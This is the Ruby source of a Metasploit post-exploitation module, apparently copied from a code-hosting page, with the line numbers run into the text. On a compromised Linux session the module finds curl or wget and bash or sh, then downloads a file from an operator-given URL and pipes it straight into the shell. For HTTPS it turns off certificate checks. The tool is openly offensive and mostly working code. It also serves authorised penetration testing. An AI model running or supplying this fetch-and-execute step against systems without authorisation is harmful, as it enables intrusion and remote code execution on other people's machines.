Path: blob/master/modules/post/linux/manage/download_exec.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File7include Msf::Post::Linux::System89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Linux Manage Download and Execute',14'Description' => %q{15This module downloads and runs a file with bash. It first tries to use curl as16its HTTP client and then wget if it's not found. Bash found in the PATH is used17to execute the file.18},19'License' => MSF_LICENSE,20'Author' => [21'Joshua D. Abraham <jabra[at]praetorian.com>',22],23'Platform' => ['linux'],24'SessionTypes' => ['shell', 'meterpreter'],25'Notes' => {26'Stability' => [CRASH_SAFE],27'Reliability' => [],28'SideEffects' => [ARTIFACTS_ON_DISK]29}30)31)3233register_options(34[35OptString.new('URL', [true, 'Full URL of file to download.'])36]37)38end3940def cmd_exec_vprint(cmd)41vprint_status("Executing: #{cmd}")42output = cmd_exec(cmd)43if !output.empty?44vprint_status(output.to_s)45end46end4748def exists_exe?(exe)49vprint_status "Searching for #{exe} in the current $PATH..."50path = get_env('PATH')51if path.nil? || path.empty?52vprint_error('No local $PATH set!')53return false54end5556vprint_status("$PATH is #{path.strip!}")5758path.split(':').each do |p|59full_path = p + '/' + exe60vprint_status "Searching for '#{full_path}' ..."61return true if file_exist?(full_path)62end6364return false65end6667def search_http_client68print_status('Checking if curl exists in the path...')69if exists_exe?('curl')70print_good('curl available, using it')71@stdout_option = ''72@http_client = 'curl'73@ssl_option = '-k'74return75end7677print_status('Checking if wget exists in the path...')78if exists_exe?('wget')79print_good('wget available, using it')80@http_client = 'wget'81@stdout_option = '-O-'82@ssl_option = '--no-check-certificate'83return84end85end8687def search_shell88print_status('Checking if bash exists in the path...')89if exists_exe?('bash')90print_good('bash available, using it')91@shell = 'bash'92return93end9495print_status('Checking if sh exists in the path...')96if exists_exe?('sh')97print_good('sh available, using it')98@shell = 'sh'99return100end101end102103def run104search_http_client105106if !@http_client107print_warning('neither curl nor wget available in the $PATH, aborting...')108return109end110111search_shell112113if !@shell114print_warning('neither bash nor sh available in the $PATH, aborting...')115return116end117118if datastore['URL'].match(%r{^https://})119cmd_exec_vprint("#{@http_client} #{@stdout_option} #{@ssl_option} #{datastore['URL']} 2>/dev/null | #{@shell}")120else121cmd_exec_vprint("#{@http_client} #{@stdout_option} #{datastore['URL']} 2>/dev/null | #{@shell}")122end123end124end125126127